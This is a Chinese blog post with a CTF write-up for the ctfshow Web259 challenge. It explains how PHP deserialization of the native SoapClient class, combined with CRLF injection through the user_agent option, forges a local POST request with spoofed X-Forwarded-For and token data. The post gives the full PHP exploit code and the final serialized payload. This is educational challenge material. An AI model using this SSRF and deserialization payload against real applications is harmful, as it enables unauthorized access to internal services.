Web259

最新推荐文章于 2024-10-10 10:17:26 发布
最新推荐文章于 2024-10-10 10:17:26 发布
阅读量208 收藏
点赞数
分类专栏: ctfshow 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qing_chuan_/article/details/134112559
版权

abbrlink: 1

Web259

先贴一下源码

<?php

highlight_file(__FILE__);


$vip = unserialize($_GET['vip']);
//vip can get flag one key
$vip->getFlag();

flag.php

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);


if($ip!=='127.0.0.1'){
	die('error');
}else{
	$token = $_POST['token'];
	if($token=='ctfshow'){
		file_put_contents('flag.txt',$flag);
	}
}

题目界面就一个简单的get传参,接收到的值反序列化传到getflag()函数

其他啥也没给,想到就是要用到原生类

后面题目界面给的源码,里面要求ip=127.0.0.1,他又开启了xff,想改包发包来着,他又进行了两次pop,还要token的值==ctfshow,结合这些,基本上可以确定用SoapClient原生类

这里先介绍一下里面的函数

explode() 函数可以把字符串打散为数组。

array_pop()函数:去除数组最后一个元素,返回数组的最后一个值。如果数组是空的,或者非数组,将返回 NULL。

file_put_contents函数:把$flag写入flag.txt

explode()函数:把字符串打散为数组

介绍完函数,分析一下去获取flag的过程。 题目中 array_pop()函数 使用了两次,最后将ip赋给$ip,

这里说一下这个 array_pop()函数两次的过程

127.0.0.1						#返回:空
127.0.0.1,127.0.0.2				#返回:127.0.0.1
127.0.0.1,127.0.0.2,127.0.0.3	#返回:127.0.0.2

这里尝试去伪造 X-Forwarded-For,发现不行,因为使用了Cloudflare,至于如何去判断一个网站是否使用了Cloudflare

至于怎么判断一个网站是否试用了Cloudflare代理

接下来我们看一下SoapClient原生类

class SoapClient {
    /* Methods */
    public __construct(?string $wsdl, array $options = [])
    public __call(string $name, array $args): mixed
    public __doRequest(
        string $request,
        string $location,
        string $action,
        int $version,
        bool $oneWay = false
    ): ?string
    public __getCookies(): array
    public __getFunctions(): ?array
    public __getLastRequest(): ?string
    public __getLastRequestHeaders(): ?string
    public __getLastResponse(): ?string
    public __getLastResponseHeaders(): ?string
    public __getTypes(): ?array
    public __setCookie(string $name, ?string $value = null): void
    public __setLocation(?string $location = null): ?string
    public __setSoapHeaders(SoapHeader|array|null $headers = null): bool
    public __soapCall(
        string $name,
        array $args,
        ?array $options = null,
        SoapHeader|array|null $inputHeaders = null,
        array &$outputHeaders = null
    ): mixed
}

由于SoapClient原生类中包含__call方法,并且我们知道:当调用一个对象中不存在的方法时候,会执行call()魔术方法。

因此在CTF中通常会出现一种存在调用不存在的方法并且需要我们伪造请求头的题目

<?php

highlight_file(__FILE__);

$vip = unserialize($_GET['vip']);
//vip can get flag one key
$vip->getFlag();

看源码可以看到他会对传入的vip进行反序列化,并且调用getflag方法,显然此处没有定义getflag方法,因此考虑到跟call魔术方法有关,原生类soap里有这个函数,加上请求头的要求

我们本地测试一下

<?php
$client = new SoapClient(null,array('uri' => 'http://127.0.0.1:9998/' , 'location' => 'http://127.0.0.1:9999/test'));

$client->getFlag();

[外链图片转存中…(img-7Zq7rt54-1698630083770)]

仔细观察后,发现是一个POST请求,并且SOAPAction的值是可控的

但是仅仅依靠这一处,没有办法伪造整一个POST请求,因为Content-Type是xml形式的,并且后面的传输内容也都是xml形式的,一般情况下POST传递参数的格式都是表单形式的(application/x-www-form-urlencoded)

因此我们可以想办法伪造User-Agent头:

<?php
$ua="qingchuan";
$client = new SoapClient(null,array('uri' => 'http://127.0.0.1:9998/' , 'location' => 'http://127.0.0.1:9999/test','user_agent' => $ua));

$client->getFlag();

image-20230924123849790

可以看到我们的USER-AGENT也该进去了,当User-Agent成为了我们的可控参数后,User-Agent下方的Content-Type也同样可以被伪造,利用\r\n换行即可伪造

再次修改后的代码如下:

<?php
$ua="qingchuan\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow";
$client = new SoapClient(null,array('uri' => 'http://127.0.0.1:9998/' , 'location' => 'http://127.0.0.1:9999/test','user_agent' => $ua));

$client->getFlag();

现在我们已经伪造好了请求包

代码中有几个注意的点

  • 因为$ua中用到了\r\n这两个换行符,因此要用双引号包裹crlf
  • HTTP请求头之间的参数用一组\r\n分割即可
  • HTTP请求头与POSTDATA之间要用两个\r\n分割.
  • 设置User-Agent时,应写成user_agent

监听一下在

image-20230924125424078

image-20230924125512870

红圈里的是有效请求,

因为我们设置了Content-Length的值为13,超出13个字符以外的都会被服务器丢弃,所以影响不大。

在本地测试完成了,接下来我们将相关参数修改与题目相对应。

<?php
$ua = "qingchuan\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow";
$client = new SoapClient(null,array('uri' => 'http://127.0.0.1/' , 'location' => 'http://127.0.0.1/flag.php' , 'user_agent' => $ua));

print_r(urlencode(serialize($client)));

O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A133%3A%22qingchuan%0D%0AX-Forwarded-For%3A+127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

传入后访问flag.txt即可

image-20230924125929067

Q1ng_chuan
关注
专栏目录
日志1(web259
weixin_53955759的博客
03-30 659
WEB 259 第一次遇到这类题,很懵,研究半天还是看了wp flag.php $xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);//获取X-Forwarded-For中第一个非unknown的有效IP字符串 array_pop($xff); $ip = array_pop($xff); //伪造ip if($ip!=='127.0.0.1'){//判断ip是否在本地 die('error'); }else{ $token = $_POST['
CTFshow 反序列化 web259
Kradress的博客
12-19 1777
目录源码思路题解总结 源码 <?php highlight_file(__FILE__); $vip = unserialize($_GET['vip']); //vip can get flag one key $vip->getFlag(); Notice: Undefined index: vip in /var/www/html/index.php on line 6 Fatal error: Uncaught Error: Call to a member func
ctfshow web259
qq_45694932的博客
09-26 1843
知识点 1.某个实例化的类,如果调用了一个不存在的函数会去调用__call魔术方法__call会发送一个请求 2.CRLF \r\n 3.POST数据提交最常用类型Content-Type: application/x-www-form-urlencoded <?php highlight_file(__FILE__); $vip = unserialize($_GET['vip']); //vip can get flag one key $vip->getFlag(); flag.
【靶场】ctfshow 详解web259原生类反序列化
Yuppie001的博客
06-29 868
在编程中,假设你用 PHP 写了一个网站,需要从另外一个服务器获取一些信息(比如天气预报),而这个服务器使用的是一种叫做 SOAP 的协议。通过构造一个SOAP客户端,并调用了getFlag的远程SOAP服务方法,这个调用过程由PHP的__call魔术方法处理,负责发送SOAP请求并接收响应。当然,这道题也可以不用反序列化来做,直接访问bp进行抓包,添加对应的xff头和相应数据块即可获得flag。的原因,所以后面的部分全部被忽略,真实有效的数据包为黄色部分。黄色部分为构造的数据包,因为。
ctfshow反序列化
njh18790816639的博客
04-18 1140
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
PHP中原生类SoapClient反序列化的SSRF利用-CTFWEB259
qq_37376469的博客
04-08 755
再对$ip的值进行判断,Web 服务器会逐行解析这些报文,处理每一行的具体内容和含义,并根据报文头和报文体的格式和协议规范来进行处理和响应。一道CTFSHOW-WEB259的通关笔记,之前刚学到反序列化的时候碰到的一道CTF题,其中涉及的知识都是我没有接触过的,网上相关的技术文章对我来说也比较笼统,很多细节都搞不明白,现在拿出来重新整理思路回顾一下。3.UDDI:是一个用于发布和发现 Web 服务的目录服务,它提供了一种标准的方式来描述 Web 服务的元数据信息,并将这些信息注册到 UDDI 目录中。
Web网页设计制作-毕业设计期末大作业】HTML、CSS、JavaScript前端网页项目源码H259.zip
05-09
Web网页设计制作-毕业设计期末大作业】HTML、CSS、JavaScript前端网页项目源码【Web网页设计制作-毕业设计期末大作业】HTML、CSS、JavaScript前端网页项目源码【Web网页设计制作-毕业设计期末大作业】HTML、CSS、...
Web网页设计制作-毕业设计期末大作业源码】(FZY259)要红酒触屏版手机wap会员用户登陆网站模板源码.zip
05-10
Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web网页设计制作-毕业设计期末大作业源码 Web...
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3496
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
android 全面屏最底部栏沉浸式
sdaujz的博客
10-04 433
Android 系统 Bar 沉浸式完美兼容方案自 Android 5.0 版本,Android 带来了沉浸式系统 ba - 掘金 (juejin.cn)Activity的onCreate方法中添加。
Android 编译使用哪个key签名?
最新发布
m0_63526467的博客
10-10 518
Android 编译使用哪个key签名?
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12【HDMI0显示】
南岭笑笑生之家
10-04 1800
Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rd-rk3588s-AHD.dts。Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rp-lcd-hdmi0.dtsi。1、配置RK3588S的默认DTS为:rk3588s-evb4-lp4x-v10.dts。【Android12需要】配置为默认HDMI0显示。
PHP中for 和 foreach 有什么区别
sheji888的专栏
10-07 859
for和foreach是PHP中两种常用的循环控制结构,它们各自具有独特的特点和适用场景。for循环更加灵活,适用于需要明确控制循环次数或进行复杂计算的场景;而foreach循环则更加简洁直观,主要用于遍历数组或对象集合。在选择循环结构时,应根据具体需求和场景进行权衡和选择。同时,需要注意避免在foreach循环中直接修改原数组,以免导致不可预测的行为。
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12时永不休眠的步骤
南岭笑笑生之家
10-04 1333
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12时永不休眠的步骤。【可以/可选尝试在DTS配置suspend的状态为:disabled】切换到dream_timeout资源,这里边有永不休眠的选项;RK3588-ANDROID12-永不息屏,不锁屏。Android11 设置菜单添加永不休眠选项。3、【改两个地方,但是只修改这里无效!RK3568-ANDROID11-不息屏。rk平台Android12屏幕永不休眠。
Android广播
LeGuan_Ha的博客
10-06 1218
为了避免横竖屏切换时重新加载界面的情况,Android设计了一种配置变更机制,在指定的环境配置发生变更之时,无需重启活动页面,只需执行特定的变更行为。getSubtype:获取网络的子类型。如果为数据连接时,子类型为2G/3G/4G等细分。getTypeName:获取网络类型名称。getType:获取网络类型。
微信小程序hbuilderx+uniapp+Android 新农村综合风貌旅游展示平台
我的个人的博客
10-04 2164
小程序端(普通用户)注册登录:用户可以注册账户并登录。首页:展示平台的主要功能和高亮内容。特色景点展示:视频和图文介绍、乡村族谱、特色文化活动小镇热门景点:展示小镇的热门景点。邻里交流:社区功能,允许用户发布消息,互动交流。乡村动态:展示乡村的最新动态和事件。乡村名片:详细介绍乡村的基本信息和特色。乡村互助:平台成员可以互相帮助解决问题。特色农产品销售:在线销售乡村特色农产品,支持配送服务。特色景点预约:提供在线预约特色景点的服务。
Android input系统原理二
abcdefg1289的博客
10-07 618
在InputManager的构造函数中可以看到接收了InputReaderPolicyInterface 和 InputDispatcherPolicyInterface 虚基类的两个子类对象,因为外部传入的两个this,说明NativeInputManager是继承了这两个虚基类的,这里就不放代码了。scanDevicesLocked 总结就是扫描监听文件,通过ioctl去驱动中获取不同设备的信息,不同输入设陪配置流程不同,加载配置文件,创建Device,最后将Device存起来。
PHP基础教程
爱写代码的小朋友
10-04 694
php基础教程
【源码+文档+调试讲解】基于Android的固定资产借用管理平台
2401_84408400的博客
10-08 1535
SpringBoot是一个非常强大的后台框架,因为SpringBoot的开发基本上不需要写配置文件,所以利用SpringBoot来构建网站的后台环境,在SpringBoot的YML配置文件中写项目启动端口,项目就可以启动了。了解需求的构成,了解需求的背后,善于洞察用户需求。MySQL 是一种关联数据库管理系统,该系统速度快而且灵活性强,主要原因是它将数据保存在不同的表中,MySQL软件的优点是成本低、体积小、速度快,开放源码,所以一般中小型网站的开发都选择 MySQL 作为网站数据库。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Q1ng_chuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值